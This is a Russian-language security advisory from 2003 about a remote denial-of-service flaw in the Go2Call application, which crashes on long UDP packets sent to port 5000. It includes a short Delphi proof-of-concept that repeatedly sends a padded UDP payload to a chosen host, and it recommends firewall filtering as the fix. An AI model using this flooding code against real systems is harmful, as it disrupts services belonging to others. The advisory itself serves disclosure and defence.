DoS против Go2Call

Дата публикации:
05.09.2003
Всего просмотров:
1082
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Go2Call

Уязвимые версии: Go2Call

Описание: Отказ в обслуживании обнаружен в Go2Call. Удаленный пользователь может аварийно завершить работу приложения.

Go2Call не в состоянии обработать длинные UDP пакеты. Злонамеренный пользователь может аварийно завершить работу приложения, посылая пакет длиною 1500 байт к 5000 UDP порту.

Пример/Эксплоит:

procedure TForm1.Button1Click(Sender: TObject);
var C:string;
    N:integer;
    MyStream:TMemoryStream;
begin
      Memo1.Lines.Add('start');
      C:=Edit3.Text; //for example 'AAAA...' 1472 char 'A' for certain
      N:=strtoint(Edit4.Text);
      NMUDP1.RemoteHost:=Edit1.Text;
      NMUDP1.RemotePort:=strtoint(Edit2.Text);
      MyStream:=TMemoryStream.Create;
      try
         MyStream.Write(C[1],Length(C));
      for n:=1 to N do
      begin
         NMUDP1.SendStream(MyStream);
      end;
      finally
         MyStream.Free;
      end;
      Memo1.Lines.Add('finish');
end;

URL производителя: http://www.go2call.com

Решение:

Используйте firewall для фильтрации 5000 UDP порта.

Ссылки: Go2Call Cash Calling vulnerable
или введите имя

CAPTCHA